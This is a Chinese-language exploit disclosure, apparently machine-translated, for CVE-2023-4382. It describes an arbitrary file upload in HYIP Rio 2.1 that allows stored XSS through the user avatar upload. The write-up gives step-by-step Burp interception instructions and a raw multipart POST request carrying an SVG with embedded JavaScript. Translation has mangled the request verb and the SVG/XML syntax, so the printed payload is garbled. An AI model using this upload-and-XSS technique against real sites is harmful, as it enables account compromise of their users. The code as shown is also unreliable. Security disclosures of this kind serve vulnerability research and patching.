Hyip Rio 2.1-任意文件上传

HackApt-37 Team · 04 9, 2025

＃利用标题: HYIP RIO 2.1-任意文件上传
＃利用作者:饼干
＃日期: 30/07/2023
＃vendor: tdevs
＃供应商HomePage3360 https://tdevs.co/
＃软件link: https://hyiprio-feature.tdevs.co/
＃版本: 2.1
＃测试在: Windows 10 Pro
＃Impact:允许用户将文件上传到Web服务器
＃CVE: CVE-2023-4382
＃＃描述
允许攻击者将恶意文件上传到服务器，例如存储的XSS
##复制步骤:
1。登录为[普通用户]
2。在[用户仪表板]中，转到此路径上的[配置文件设置] : https://website/user/settings
3。将任何图像上传到[avatar]
4。用[burp代理拦截]捕获邮政请求
5。编辑文件扩展名为.svg注入您的[邪恶代码]或[存储的XSS]
----------------------------------------------------------------------------------------
发布/用户/设置/配置文件上间http/2
content-disposition: form-data;名称='avatar';文件名='xss.svg'
content-type:图像/png
？xml版本='1.0'startalone='no'？
！
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='＃009900'stroke='＃004400'/
脚本类型='text/javascript'
警报（'xss by skalvin'）;
/脚本
/svg
----------------------------------------------------------------------------------------
6。发送请求
7.从[burp logger]捕获Get请求，以获取上载[存储-XSS]或右键单击的路径，然后复制链接
8。在此路径上访问您的邪恶文件: https://website/Assets/global/image...*********************************************
[-] 完毕